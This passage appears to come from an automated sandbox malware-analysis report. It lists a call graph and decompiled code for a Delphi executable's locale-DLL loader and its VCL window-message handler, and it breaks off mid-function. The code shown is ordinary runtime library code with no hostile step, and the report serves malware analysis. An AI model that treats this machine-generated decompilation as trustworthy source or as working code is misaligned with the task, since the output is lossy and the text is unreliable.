48868->48879 48869 4049c0 21 API calls 48871 41aa19 48869->48871 48872 41a984 92 API calls 48870->48872 48870->48879 48871->48862 48881 41a8f8 66 API calls 48871->48881 48873 41a9c6 48872->48873 48883 405f8c 48873->48883 48877 41a9f4 48891 41a81c 48877->48891 48879->48869 48880->48859 48881->48862 48882->48864 48900 405f64 VirtualQuery 48883->48900 48886 405fdc 48887 406003 48886->48887 48888 405fe6 48886->48888 48887->48877 48888->48887 48889 405f94 30 API calls 48888->48889 48890 405ffc 48889->48890 48890->48877 48892 41a82d 48891->48892 48893 41a83c FindResourceA 48892->48893 48894 41a899 48893->48894 48895 41a84c 48893->48895 48894->48879 48902 41e0d0 48895->48902 48897 41a85d 48906 41da30 48897->48906 48899 41a878 48899->48879 48901 405f7e 48900->48901 48901->48886 48903 41e0da 48902->48903 48911 41e198 FindResourceA 48903->48911 48905 41e108 48905->48897 48923 41e254 48906->48923 48908 41da4c 48927 420288 48908->48927 48910 41da67 48910->48899 48912 41e1c4 LoadResource 48911->48912 48913 41e1bd 48911->48913 48914 41e1d7 48912->48914 48915 41e1de SizeofResource LockResource 48912->48915 48921 41e128 66 API calls 48913->48921 48922 41e128 66 API calls 48914->48922 48919 41e1fc 48915->48919 48917 41e1c3 48917->48912 48919->48905 48920 41e1dd 48920->48915 48921->48917 48922->48920 48924 41e25e 48923->48924 48925 40275c 35 API calls 48924->48925 48926 41e277 48925->48926 48926->48908 48955 420670 48927->48955 48930 420300 48993 420694 66 API calls 48930->48993 48931 420335 48996 420694 66 API calls 48931->48996 48934 42030b 48994 41a398 68 API calls 48934->48994 48935 420346 48937 42034f 48935->48937 48938 42035c 48935->48938 48997 420694 66 API calls 48937->48997 48998 420694 66 API calls 48938->48998 48940 420313 48995 420694 66 API calls 48940->48995 48942 420377 48999 420228 66 API calls 48942->48999 48945 420328 48960 41a0e8 48945->48960 48949 4203d0 48951 420460 48949->48951 48979 425a84 48949->48979 48983 425d3c 48949->48983 48950 4204a0 48950->48910 48951->48950 48952 41ac6c 66 API calls 48951->48952 48952->48951 49000 41ee34 48955->49000 48958 4202c1 48958->48930 48958->48931 48961 41a0f5 48960->48961 49006 419fd4 RtlEnterCriticalSection 48961->49006 48963 41a1cf 49007 41a08c RtlLeaveCriticalSection 48963->49007 48964 41ac6c 66 API calls 48970 41a12c 48964->48970 48967 41a1e6 48971 406cdc 48967->48971 48968 41ac6c 66 API calls 48969 41a18e 48968->48969 48969->48963 48969->48968 48970->48964 48970->48969 49008 419b10 66 API calls 48970->49008 48972 406d11 TlsGetValue 48971->48972 48973 406ceb 48971->48973 48974 406cf6 48972->48974 48975 406d1b 48972->48975 48973->48949 49009 406c98 LocalAlloc TlsSetValue 48974->49009 48975->48949 48977 406cfb TlsGetValue 48978 406d0a 48977->48978 48978->48949 48980 425d3c 83 API calls 48979->48980 48981 425a9a 48980->48981 48982 425ab3 GetTextExtentPoint32A 48981->48982 48982->48951 48984 425da2 48983->48984 48990 425d55 48983->48990 48984->48951 48985 425d79 48986 425d8a 48985->48986 49011 425dd8 28 API calls 48985->49011 48988 425d96 48986->48988 49012 425e04 6 API calls 48986->49012 48988->48984 49013 425e34 10 API calls 48988->49013 48990->48985 49010 40d200 66 API calls 48990->49010 48993->48934 48994->48940 48995->48945 48996->48935 48997->48945 48998->48942 48999->48945 49002 41ee3f 49000->49002 49001 41ee79 49001->48958 49004 41e8f4 66 API calls 49001->49004 49002->49001 49005 41ee80 66 API calls 49002->49005 49004->48958 49005->49002 49006->48970 49007->48967 49008->48970 49009->48977 49010->48985 49011->48986 49012->48988 49013->48984 49015 4045d6 49014->49015 49016 404600 49014->49016 49015->49016 49021 478cb0 49015->49021 49027 406b3c 49015->49027 49037 435634 WinHelpA 49015->49037 49016->48616 49020->48615 49022 478cc9 49021->49022 49023 478d18 49021->49023 49024 478d03 49022->49024 49025 478cfe 7426F460 49022->49025 49023->49015 49038 4054c8 21 API calls 49024->49038 49025->49024 49028 406b55 49027->49028 49030 406b78 49027->49030 49039 40308c 49028->49039 49030->49015 49032 40308c 4 API calls 49033 406b69 49032->49033 49034 40308c 4 API calls 49033->49034 49035 406b73 49034->49035 49046 401b60 49035->49046 49037->49015 49038->49023 49040 4030cb 49039->49040 49041 40309c 49039->49041 49045 4030c9 49040->49045 49059 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49040->49059 49041->49040 49043 4030a2 49041->49043 49043->49045 49058 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49043->49058 49045->49032 49047 401b71 49046->49047 49048 401c3d 49046->49048 49049 401b92 LocalFree 49047->49049 49050 401b88 RtlEnterCriticalSection 49047->49050 49048->49030 49051 401bc5 49049->49051 49050->49049 49052 401bb3 VirtualFree 49051->49052 49053 401bcd 49051->49053 49052->49051 49054 401bf4 LocalFree 49053->49054 49055 401c0b 49053->49055 49054->49054 49054->49055 49056 401c21 RtlLeaveCriticalSection 49055->49056 49057 401c2b RtlDeleteCriticalSection 49055->49057 49056->49057 49057->49030 49058->49045 49059->49045 49060 43eaf8 73CA9840 49061 43eb29 49060->49061 49062 43eb2e 49060->49062 49064 40e79c 68 API calls 49061->49064 49064->49062 49065 41dadc 49068 409974 WriteFile 49065->49068 49069 409991 49068->49069 49070 41bd4e 49071 41bd5f 49070->49071 49074 4348a8 49071->49074 49075 4348d3 49074->49075 49076 43497d 49074->49076 49078 4348e3 SendMessageA 49075->49078 49077 4049c0 21 API calls 49076->49077 49079 41bd6c 49077->49079 49080 434901 49078->49080 49081 4348ef 49078->49081 49083 434912 SendMessageA 49080->49083 49092 404ccc 49081->49092 49083->49076 49084 43491e 49083->49084 49087 43492e SendMessageA 49084->49087 49085 4348ff 49086 434959 SendMessageA 49085->49086 49088 434967 49086->49088 49087->49076 49089 434938 49087->49089 49091 434977 SendMessageA 49088->49091 49090 404ccc 35 API calls 49089->49090 49090->49085 49091->49076 49093 404cd0 49092->49093 49101 404c88 49092->49101 49094 404a14 49093->49094 49095 404ce0 49093->49095 49096 404cee 49093->49096 49093->49101 49099 404a84 35 API calls 49094->49099 49103 404a28 49094->49103 49102 404a14 35 API calls 49095->49102 49098 404a84 35 API calls 49096->49098 49097 404a56 49097->49085 49110 404d01 49098->49110 49099->49103 49100 404ccb 49100->49085 49101->49094 49101->49100 49104 404c96 49101->49104 49102->49101 49103->49097 49114 40277c 21 API calls 49103->49114 49106 404cc0 49104->49106 49107 404ca9 49104->49107 49108 40500c 35 API calls 49106->49108 49109 40500c 35 API calls 49107->49109 49112 404cae 49108->49112 49109->49112 49111 404a14 35 API calls 49110->49111 49113 404d2d 49111->49113 49112->49085 49113->49085 49114->49097

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                                                                                                                                                            0x004061d1
                                                                                                                                                                                                                            0x004061d3
                                                                                                                                                                                                                            0x004061db
                                                                                                                                                                                                                            0x004061ec
                                                                                                                                                                                                                            0x004061f1
                                                                                                                                                                                                                            0x0040620a
                                                                                                                                                                                                                            0x00406211
                                                                                                                                                                                                                            0x00406253
                                                                                                                                                                                                                            0x00406255
                                                                                                                                                                                                                            0x00406256
                                                                                                                                                                                                                            0x0040625b
                                                                                                                                                                                                                            0x0040625e
                                                                                                                                                                                                                            0x00406261
                                                                                                                                                                                                                            0x00406273
                                                                                                                                                                                                                            0x00406296
                                                                                                                                                                                                                            0x004062b6
                                                                                                                                                                                                                            0x004062b6
                                                                                                                                                                                                                            0x004062ba
                                                                                                                                                                                                                            0x004062c0
                                                                                                                                                                                                                            0x004062c3
                                                                                                                                                                                                                            0x004062c6
                                                                                                                                                                                                                            0x004062d4
                                                                                                                                                                                                                            0x00406213
                                                                                                                                                                                                                            0x00406228
                                                                                                                                                                                                                            0x0040622f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406231
                                                                                                                                                                                                                            0x00406246
                                                                                                                                                                                                                            0x0040624d
                                                                                                                                                                                                                            0x004062dc
                                                                                                                                                                                                                            0x004062e4
                                                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                                                            0x004062ec
                                                                                                                                                                                                                            0x004062ff
                                                                                                                                                                                                                            0x00406304
                                                                                                                                                                                                                            0x0040630d
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406329
                                                                                                                                                                                                                            0x0040632a
                                                                                                                                                                                                                            0x00406337
                                                                                                                                                                                                                            0x0040633c
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040634b
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x00406359
                                                                                                                                                                                                                            0x0040635e
                                                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                                                            0x0040636f
                                                                                                                                                                                                                            0x00406370
                                                                                                                                                                                                                            0x00406371
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x004063a3
                                                                                                                                                                                                                            0x004063a7
                                                                                                                                                                                                                            0x004063a8
                                                                                                                                                                                                                            0x004063a9
                                                                                                                                                                                                                            0x004063b9
                                                                                                                                                                                                                            0x004063be
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x004063c4
                                                                                                                                                                                                                            0x004063d9
                                                                                                                                                                                                                            0x004063dd
                                                                                                                                                                                                                            0x004063de
                                                                                                                                                                                                                            0x004063df
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x004063fd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040624d
                                                                                                                                                                                                                            0x0040622f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                            • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00459934 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 25 459934-459968 26 45999c-4599b1 call 4597e8 25->26 27 45996a-45996b 25->27 33 459a65-459a6a 26->33 34 4599b7 26->34 28 45996d-459989 call 41ac6c 27->28 53 459998-45999a 28->53 54 45998b-459993 28->54 37 459a6c 33->37 38 459abb-459ac0 33->38 35 459f03-459f18 call 45aae4 34->35 36 4599bd-4599c0 34->36 60 459fe4-459fec 35->60 39 4599c2 36->39 40 459a2c-459a2f 36->40 45 459a72-459a77 37->45 46 459ddb-459de3 37->46 42 459ae1-459ae6 38->42 43 459ac2 38->43 49 459cc8-459ccf 39->49 50 4599c8-4599cb 39->50 51 459a31 40->51 52 459a4e-459a51 40->52 58 459f56-459f5d 42->58 59 459aec-459af2 42->59 55 459f1d-459f24 43->55 56 459ac8-459acd 43->56 47 459aa2-459aa7 45->47 48 459a79 45->48 46->60 61 459de9-459df4 call 441704 46->61 74 459aad-459ab0 47->74 75 459e9c-459ea7 47->75 71 459e74-459e7f 48->71 72 459a7f-459a84 48->72 49->60 78 459cd5-459cdf 49->78 62 4599d1 50->62 63 459fdd-459fde call 4598ac 50->63 64 459fa7-459fb8 call 458dec call 4598ac 51->64 65 459a37-459a3a 51->65 66 459a57-459a5a 52->66 67 459b93-459ba1 call 45a038 52->67 53->26 53->28 73 45a003-45a009 54->73 68 459f26-459f39 call 45a5a4 55->68 69 459f3e-459f51 call 45a600 55->69 79 459ec4-459ed2 IsIconic 56->79 80 459ad3-459ad6 56->80 76 459f70-459f7f 58->76 77 459f5f-459f6e 58->77 81 459d98-459db4 call 45ba10 59->81 82 459af8 59->82 60->73 61->60 113 459dfa-459e09 call 441704 IsWindowEnabled 61->113 62->40 111 459fe3 63->111 64->60 86 459f81-459fa5 call 445ed0 call 459840 call 4598ac 65->86 87 459a40-459a43 65->87 89 459ce4-459cf0 66->89 90 459a60 66->90 67->60 68->60 69->60 71->60 101 459e85-459e97 71->101 95 459a86-459a8c 72->95 96 459afd-459b0d 72->96 98 459ab6 74->98 99 459db9-459dc6 call 45a47c 74->99 75->60 84 459ead-459ebf 75->84 76->60 77->60 78->60 79->60 85 459ed8-459ee3 GetFocus 79->85 80->35 100 459adc 80->100 81->60 82->63 84->60 85->60 105 459ee9-459ef2 call 451750 85->105 86->60 106 459bc7-459be8 call 4598ac 87->106 107 459a49 87->107 89->60 118 459cf6-459d00 89->118 90->63 114 459a92-459a97 95->114 115 459c9c-459cc3 SendMessageA 95->115 103 459b0f-459b14 96->103 104 459b18-459b20 call 45a054 96->104 98->63 99->60 139 459dcc-459dd6 99->139 100->63 101->60 121 459b25-459b2d call 45a104 103->121 122 459b16-459b39 call 4598ac 103->122 104->60 105->60 148 459ef8-459efe SetFocus 105->148 149 459c0c-459c29 call 45973c PostMessageA 106->149 150 459bea-459c07 call 45974c PostMessageA 106->150 107->63 111->60 113->60 151 459e0f-459e1e call 441704 IsWindowVisible 113->151 129 459a9d 114->129 130 459fba-459fc6 call 4328f8 call 4329d8 114->130 115->60 118->60 132 459d06-459d10 118->132 121->60 122->60 129->63 130->60 169 459fc8-459fd2 call 4328f8 call 432a34 130->169 143 459d12-459d2e call 40edc4 132->143 144 459d8b-459d93 132->144 139->60 161 459d70-459d86 GetLastError 143->161 162 459d30-459d52 GetProcAddress 143->162 144->60 148->60 149->60 150->60 151->60 170 459e24-459e6f GetFocus call 441704 SetFocus call 43c130 SetFocus 151->170 161->60 162->60 168 459d58-459d6b 162->168 168->60 169->60 170->60
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0045A054(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0045A104(_v8);
								} else {
									E004598AC(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004329D8(E004328F8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00432A34(E004328F8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0045A038(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
